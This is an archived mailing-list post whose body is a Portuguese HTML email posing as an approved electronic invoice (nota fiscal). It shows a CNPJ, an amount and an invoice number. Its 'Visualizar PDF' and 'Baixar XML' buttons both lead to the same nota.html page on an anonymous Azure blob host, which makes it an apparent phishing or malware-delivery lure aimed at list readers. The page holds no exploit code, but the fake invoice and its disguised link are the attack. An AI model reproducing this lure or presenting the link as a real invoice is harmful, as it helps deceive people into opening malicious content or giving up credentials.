[sunxacml-discuss] Nota fiscal eletrônica emitida com sucesso!
Brought to you by:
farrukh_najmi,
sethp
From: Financeiro <rai...@no...> - 2025-07-01 08:22:11
|
<html lang="pt-BR"> <head> <meta charset="UTF-8"> <style> body { font-family: Arial, sans-serif; background-color: #f8f8f8; margin: 0; padding: 20px; } .container { background-color: #fff; border-radius: 8px; padding: 20px; max-width: 800px; margin: auto; box-shadow: 0 0 10px rgba(0,0,0,0.1); } h1 { color: #2a7c3e; text-align: center; } table { width: 100%; border-collapse: collapse; margin-bottom: 20px; } table td { border: 1px solid #ccc; padding: 10px; } label { display: block; margin: 10px 0 5px; } input[type="text"], input[type="date"] { width: 100%; padding: 8px; box-sizing: border-box; } .file-download { margin-top: 15px; } .file-download a, .download-button { display: inline-block; padding: 10px 15px; background-color: #2a7c3e; color: white; text-decoration: none; border-radius: 5px; } .file-download a:hover, .download-button:hover { background-color: #256d37; } </style> </head> <body> <div class="container"> <h1>Envio de Nota Fiscal Eletrônica</h1> <table> <tr> <td><strong>Cliente:</strong><br>sun...@li...</td> <td><strong>CNPJ:</strong><br>13.727.823/0001-65</td> <td><strong>Status:</strong><br>Aprovado</td> </tr> <tr> <td><strong>Data da Compra:</strong><br>01/07/2025</td> <td colspan="3"><strong>Valor Total:</strong><br>R$ 1.820,00</td> </tr> </table> <label for="nota">Número da Nota Fiscal:</label> <input type="text" id="nota" name="nota" value="4890993602055795258"> <label for="data">Data de Emissão:</label> <input type="date" id="data" name="data" value="2025-07-01"> <div class="file-download"> <p><strong>Arquivo da Nota Fiscal:</strong></p> <a href="https://673995default.blob.core.windows.net/main/nota.html" rel="noopener noreferrer" target="_blank" title="">Visualizar PDF</a> </div> <br> <a href="https://673995default.blob.core.windows.net/main/nota.html" rel="noopener noreferrer" class="download-button" target="_blank" title="">Baixar XML</a> </div> </body> </html> |